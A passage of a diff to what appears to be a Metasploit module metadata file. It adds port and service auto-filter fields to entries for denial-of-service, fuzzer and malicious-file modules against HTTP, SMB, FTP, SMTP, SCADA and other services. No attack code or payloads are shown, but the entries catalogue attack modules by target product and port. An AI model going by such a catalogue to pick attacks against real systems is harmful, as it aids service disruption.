"platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-05-29 16:09:27 +0000", "path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb", @@ -6331,6 +8559,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb", @@ -6373,6 +8607,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/hashcollision_dos.rb", @@ -6404,6 +8653,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-09 17:02:24 +0000", "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb", @@ -6434,6 +8689,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-06 20:45:50 +0000", "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb", @@ -6465,6 +8726,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-16 14:59:32 +0000", "path": "/modules/auxiliary/dos/http/marked_redos.rb", @@ -6496,6 +8772,12 @@ "platform": "", "arch": "", "rport": 2001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/monkey_headers.rb", @@ -6531,6 +8813,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", @@ -6565,6 +8862,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb", @@ -6595,6 +8898,21 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb", @@ -6630,6 +8948,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/http/rails_action_view.rb", @@ -6663,6 +8987,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb", @@ -6694,6 +9033,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb", @@ -6726,6 +9080,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb", @@ -6761,6 +9130,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-14 11:25:00 +0000", "path": "/modules/auxiliary/dos/http/webkitplus.rb", @@ -6793,6 +9168,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/webrick_regex.rb", @@ -6825,6 +9215,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb", @@ -6859,6 +9264,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", @@ -6894,6 +9314,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb", @@ -6925,6 +9360,12 @@ "platform": "", "arch": "", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-11 11:49:31 +0000", "path": "/modules/auxiliary/dos/http/ws_dos.rb", @@ -6955,6 +9396,12 @@ "platform": "", "arch": "", "rport": 5353, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb", @@ -6986,6 +9433,12 @@ "platform": "", "arch": "", "rport": 7902, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/misc/dopewars.rb", @@ -7020,6 +9473,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb", @@ -7051,6 +9510,12 @@ "platform": "", "arch": "", "rport": 11460, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb", @@ -7082,6 +9547,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/misc/memcached.rb", @@ -7114,6 +9585,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", @@ -7146,6 +9623,12 @@ "platform": "", "arch": "", "rport": 1723, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb", @@ -7178,6 +9661,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb", @@ -7208,6 +9697,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb", @@ -7238,6 +9735,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb", @@ -7271,6 +9776,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb", @@ -7303,6 +9816,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb", @@ -7335,6 +9863,12 @@ "platform": "", "arch": "", "rport": 48899, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb", @@ -7365,6 +9899,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb", @@ -7396,6 +9936,12 @@ "platform": "", "arch": "", "rport": 12401, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb", @@ -7426,6 +9972,12 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-28 13:12:43 +0000", "path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb", @@ -7458,6 +10010,12 @@ "platform": "", "arch": "", "rport": 52302, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb", @@ -7490,6 +10048,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb", @@ -7522,6 +10092,12 @@ "platform": "", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb", @@ -7553,6 +10129,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", @@ -7587,6 +10169,12 @@ "platform": "", "arch": "", "rport": 4433, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb", @@ -7617,6 +10205,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb", @@ -7648,6 +10242,12 @@ "platform": "", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb", @@ -7679,6 +10279,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb", @@ -7708,6 +10314,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/tcp/synflood.rb", @@ -7741,6 +10353,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb", @@ -7772,6 +10390,12 @@ "platform": "", "arch": "", "rport": 5400, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb", @@ -7803,6 +10427,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb", @@ -7835,6 +10465,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb", @@ -7868,6 +10504,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb", @@ -7899,6 +10542,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb", @@ -7934,6 +10584,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", @@ -7969,6 +10625,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", @@ -8000,6 +10663,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb", @@ -8031,6 +10700,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb", @@ -8063,6 +10739,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb", @@ -8094,6 +10777,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb", @@ -8125,6 +10815,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb", @@ -8156,6 +10853,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb", @@ -8185,6 +10889,12 @@ "platform": "", "arch": "", "rport": 27888, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/windows/games/kaillera.rb", @@ -8218,6 +10928,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", @@ -8249,6 +10965,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb", @@ -8280,6 +11011,12 @@ "platform": "", "arch": "", "rport": 5355, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb", @@ -8311,6 +11048,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb", @@ -8351,6 +11094,12 @@ "platform": "", "arch": "", "rport": 3389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb", @@ -8383,6 +11132,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb", @@ -8416,6 +11173,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb", @@ -8448,6 +11213,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb", @@ -8480,6 +11253,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb", @@ -8515,6 +11296,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", @@ -8546,6 +11333,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", @@ -8579,6 +11372,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb", @@ -8612,6 +11411,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb", @@ -8647,6 +11454,12 @@ "platform": "", "arch": "", "rport": 138, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb", @@ -8676,6 +11489,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb", @@ -8705,6 +11526,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb", @@ -8736,6 +11563,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb", @@ -8766,6 +11605,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb", @@ -8797,6 +11642,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb", @@ -8828,6 +11679,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb", @@ -8860,6 +11717,12 @@ "platform": "", "arch": "", "rport": 5247, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/capwap.rb", @@ -8891,6 +11754,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/chunked.rb", @@ -8923,6 +11792,12 @@ "platform": "", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/cldap.rb", @@ -8953,6 +11828,12 @@ "platform": "", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/ldap.rb", @@ -8986,6 +11867,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-12 22:55:38 +0000", "path": "/modules/auxiliary/fileformat/badpdf.rb", @@ -9019,6 +11906,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-05 11:51:48 +0000", "path": "/modules/auxiliary/fileformat/multidrop.rb", @@ -9049,6 +11942,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-06 11:26:20 +0000", "path": "/modules/auxiliary/fileformat/odt_badodt.rb", @@ -9078,6 +11977,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb", @@ -9107,6 +12012,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb", @@ -9137,6 +12048,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb", @@ -9167,6 +12084,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/http/http_form_field.rb", @@ -9196,6 +12128,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb", @@ -9225,6 +12163,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb", @@ -9254,6 +12198,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-12 09:54:09 +0000", "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb", @@ -9283,6 +12233,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb", @@ -9312,6 +12268,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", @@ -9341,6 +12305,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb", @@ -9370,6 +12342,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb", @@ -9399,6 +12377,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb", @@ -9428,6 +12414,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb", @@ -9457,6 +12451,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb", @@ -9486,6 +12488,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb", @@ -9515,6 +12529,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb", @@ -9544,6 +12564,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + 